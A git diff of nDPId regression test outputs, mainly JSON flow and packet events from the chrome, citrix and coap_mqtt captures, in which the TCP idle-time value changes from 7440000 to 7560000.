+00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","packets-captured":5633,"packets-processed":5633,"total-skipped-flows":0,"total-l4-data-len":4613247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620902515049} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5633/5633 diff --git a/test/results/citrix.pcap.out b/test/results/citrix.pcap.out index 170608d70..b1d24ffac 100644 --- a/test/results/citrix.pcap.out +++ b/test/results/citrix.pcap.out @@ -1,10 +1,10 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"citrix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":0,"flow_last_seen":0,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":0,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":0,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":0,"pkt":"4F+5aekiABUXp3WjCABFAAAsrYMAAIAGYjoVAAAIFgAAB7CpBdYP1me4AAAAAGACgAC\/CQAAAgQFtAAA6CmQmA=="} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":2,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":2,"pkt":"ABUXp3Wj4F+5aekiCABFAAAsrVIAAH4GZGsWAAAHFQAACAXWsKkP1nFlD9ZnuWASgAA9vQAAAgQFtAAA3WOanQ=="} -00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":2,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":2,"pkt":"4F+5aekiABUXp3WjCABFAAAorYQAAIAGYj0VAAAIFgAAB7CpBdYP1me5D9ZxZlAQgABVegAAAAAAAAAAIuNIFQ=="} -00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00530{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":0,"flow_last_seen":0,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":0,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":0,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":0,"pkt":"4F+5aekiABUXp3WjCABFAAAsrYMAAIAGYjoVAAAIFgAAB7CpBdYP1me4AAAAAGACgAC\/CQAAAgQFtAAA6CmQmA=="} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":2,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":24,"thread_ts_msec":2,"pkt":"ABUXp3Wj4F+5aekiCABFAAAsrVIAAH4GZGsWAAAHFQAACAXWsKkP1nFlD9ZnuWASgAA9vQAAAgQFtAAA3WOanQ=="} +00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":2,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":20,"thread_ts_msec":2,"pkt":"4F+5aekiABUXp3WjCABFAAAorYQAAIAGYj0VAAAIFgAAB7CpBdYP1me5D9ZxZlAQgABVegAAAAAAAAAAIuNIFQ=="} +00591{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":2,"flow_last_seen":8,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":8,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":2,"flow_last_seen":1605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":855,"flow_tot_l4_payload_len":5490,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1605,"l3_proto":"ip4","src_ip":"21.0.0.8","dst_ip":"22.0.0.7","src_port":45225,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Citrix","breed":"Acceptable","category":"Network"}} 00545{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"citrix.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-data-len":5490,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1605} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 diff --git a/test/results/coap_mqtt.pcap.out b/test/results/coap_mqtt.pcap.out index 2579ea9ae..5ce90f3de 100644 --- a/test/results/coap_mqtt.pcap.out +++ b/test/results/coap_mqtt.pcap.out @@ -38,32 +38,32 @@ 00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090528017,"flow_last_seen":1375090529165,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1375090935293,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":33499,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1375091005616,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":85,"pkt_l4_len":31,"thread_ts_msec":1375091005616,"pkt":"uCfrprIvACTop0mhht1gAAAAAB8RQLu7AAAAAAAAAAAAAAAAAAG7uwAAAAAAAAAAAAAAAAADtuMWMwAfsCNAAZUjt3N0b3JhZ2UKbXlyZXNvdXJjZQ=="} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-data-len":436,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1455907243976} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":22,"thread_ts_msec":1455907243976,"pkt":"CAAnmO\/hCAAnAERyCABFAAAqELhAAIAG+F7AqDgBwKg4ZdESRF16higakEiEGVAYAQAwoAAAwAAAAAAA"} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907243976,"flow_last_seen":1455907243976,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907243976,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455907243977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":22,"thread_ts_msec":1455907243977,"pkt":"CAAnAERyCAAnmO\/hCABFAAAqrABAAEAGnRbAqDhlwKg4AURd0RKQSIQZeoYoHFAYAOXx0wAA0AA="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455907244175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1455907244175,"pkt":"CAAnmO\/hCAAnAERyCABFAAAoELlAAIAG+F\/AqDgBwKg4ZdESRF16higckEiEG1AQAQDwpgAAAAAAAAAA"} 00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1375090926676,"flow_last_seen":1375090935086,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":50250,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} 00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1375090935240,"flow_last_seen":1375091022272,"flow_idle_time":180000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":95,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1455907244175,"l3_proto":"ip6","src_ip":"bbbb::1","dst_ip":"bbbb::3","src_port":46819,"dst_port":5683,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"COAP","breed":"Safe","category":"RPC"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455907258332,"flow_last_seen":1455907258332,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1455907258332,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 